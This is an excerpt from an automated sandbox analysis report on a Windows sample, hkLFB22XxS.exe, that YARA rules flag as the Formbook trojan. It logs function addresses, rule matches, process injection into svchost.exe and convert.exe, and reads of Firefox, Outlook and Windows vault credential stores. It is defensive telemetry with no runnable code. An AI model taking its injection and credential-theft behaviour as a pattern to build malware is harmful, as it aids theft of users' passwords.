            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F03FD52_2_02F03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E702C08_2_02E702C0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E902748_2_02E90274
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EB03E68_2_02EB03E6
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DFE3F08_2_02DFE3F0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAA3528_2_02EAA352
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E820008_2_02E82000
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA81CC8_2_02EA81CC
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EB01AA8_2_02EB01AA
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA41A28_2_02EA41A2
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E781588_2_02E78158
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DE01008_2_02DE0100
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E8A1188_2_02E8A118
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E0C6E08_2_02E0C6E0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DEC7C08_2_02DEC7C0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF07708_2_02DF0770
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E147508_2_02E14750
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E9E4F68_2_02E9E4F6
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA24468_2_02EA2446
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E944208_2_02E94420
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EB05918_2_02EB0591
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF05358_2_02DF0535
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DEEA808_2_02DEEA80
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA6BD78_2_02EA6BD7
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAAB408_2_02EAAB40
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E1E8F08_2_02E1E8F0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DD68B88_2_02DD68B8
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF28408_2_02DF2840
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DFA8408_2_02DFA840
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EBA9A68_2_02EBA9A6
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF29A08_2_02DF29A0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E069628_2_02E06962
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAEEDB8_2_02EAEEDB
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E02E908_2_02E02E90
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EACE938_2_02EACE93
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF0E598_2_02DF0E59
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAEE268_2_02EAEE26
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DE2FC88_2_02DE2FC8
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DFCFE08_2_02DFCFE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E6EFA08_2_02E6EFA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E64F408_2_02E64F40
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E32F288_2_02E32F28
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E10F308_2_02E10F30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E92F308_2_02E92F30
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DE0CF28_2_02DE0CF2
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E90CB58_2_02E90CB5
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF0C008_2_02DF0C00
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DEADE08_2_02DEADE0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E08DBF8_2_02E08DBF
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DFAD008_2_02DFAD00
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E8CD1F8_2_02E8CD1F
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E912ED8_2_02E912ED
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E0B2C08_2_02E0B2C0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF52A08_2_02DF52A0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E3739A8_2_02E3739A
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DDD34C8_2_02DDD34C
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA132D8_2_02EA132D
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA70E98_2_02EA70E9
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAF0E08_2_02EAF0E0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF70C08_2_02DF70C0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E9F0CC8_2_02E9F0CC
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DFB1B08_2_02DFB1B0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EBB16B8_2_02EBB16B
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E2516C8_2_02E2516C
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DDF1728_2_02DDF172
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA16CC8_2_02EA16CC
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E356308_2_02E35630
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAF7B08_2_02EAF7B0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DE14608_2_02DE1460
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAF43F8_2_02EAF43F
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EB95C38_2_02EB95C3
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E8D5B08_2_02E8D5B0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA75718_2_02EA7571
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E9DAC68_2_02E9DAC6
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E35AA08_2_02E35AA0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E8DAAC8_2_02E8DAAC
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E91AA38_2_02E91AA3
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E63A6C8_2_02E63A6C
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAFA498_2_02EAFA49
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA7A468_2_02EA7A46
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E65BF08_2_02E65BF0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E2DBF98_2_02E2DBF9
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E0FB808_2_02E0FB80
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAFB768_2_02EAFB76
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF38E08_2_02DF38E0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E5D8008_2_02E5D800
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF99508_2_02DF9950
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E0B9508_2_02E0B950
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E859108_2_02E85910
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF9EB08_2_02DF9EB0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DB3FD28_2_02DB3FD2
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DB3FD58_2_02DB3FD5
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF1F928_2_02DF1F92
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAFFB18_2_02EAFFB1
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAFF098_2_02EAFF09
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EAFCF28_2_02EAFCF2
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E69C328_2_02E69C32
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02E0FDC08_2_02E0FDC0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA7D738_2_02EA7D73
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02DF3D408_2_02DF3D40
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02EA1D5A8_2_02EA1D5A
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_002416D08_2_002416D0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0025A1208_2_0025A120
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0023C8F08_2_0023C8F0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0023CB108_2_0023CB10
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_0023AB908_2_0023AB90
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_002431BB8_2_002431BB
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_002431C08_2_002431C0
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02AAB2088_2_02AAB208
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02AAC1A88_2_02AAC1A8
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02AAA4BA8_2_02AAA4BA
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02AAA4BF8_2_02AAA4BF
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02AAA45B8_2_02AAA45B
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02AABE068_2_02AABE06
            Source: C:\Windows\SysWOW64\convert.exeCode function: 8_2_02AABCE88_2_02AABCE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 280 times
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: String function: 00830D27 appears 70 times
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: String function: 00838B40 appears 42 times
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: String function: 00817F41 appears 35 times
            Source: C:\Windows\SysWOW64\convert.exeCode function: String function: 02E5EA12 appears 86 times
            Source: C:\Windows\SysWOW64\convert.exeCode function: String function: 02DDB970 appears 280 times
            Source: C:\Windows\SysWOW64\convert.exeCode function: String function: 02E25130 appears 58 times
            Source: C:\Windows\SysWOW64\convert.exeCode function: String function: 02E6F290 appears 105 times
            Source: C:\Windows\SysWOW64\convert.exeCode function: String function: 02E37E54 appears 111 times
            Source: hkLFB22XxS.exe, 00000001.00000003.2109156800.00000000041E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs hkLFB22XxS.exe
            Source: hkLFB22XxS.exe, 00000001.00000003.2115117668.00000000043DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs hkLFB22XxS.exe
            Source: hkLFB22XxS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/10
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087A2D5 GetLastError,FormatMessageW,1_2_0087A2D5
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00868713 AdjustTokenPrivileges,CloseHandle,1_2_00868713
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00868CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_00868CC3
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0087B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_0087B59E
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_0088F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_0088F121
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_008886D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,1_2_008886D0
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeCode function: 1_2_00814FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_00814FE9
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeFile created: C:\Users\user\AppData\Local\Temp\aut8EC1.tmpJump to behavior
            Source: hkLFB22XxS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: convert.exe, 00000008.00000002.4573809328.0000000002983000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2745838231.0000000002963000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000002.4573809328.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2745949723.0000000002983000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000008.00000003.2747956351.000000000298E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: hkLFB22XxS.exeReversingLabs: Detection: 67%
            Source: unknownProcess created: C:\Users\user\Desktop\hkLFB22XxS.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeProcess created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
            Source: C:\Windows\SysWOW64\convert.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe"Jump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeProcess created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\convert.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hkLFB22XxS.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: ifsutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: scecli.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: osuninst.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\convert.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: hkLFB22XxS.exeStatic file information: File size 1233920 > 1048576
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: hkLFB22XxS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: convert.pdb source: svchost.exe, 00000002.00000002.2571611959.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2540180988.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000003.2509356666.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578051292.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
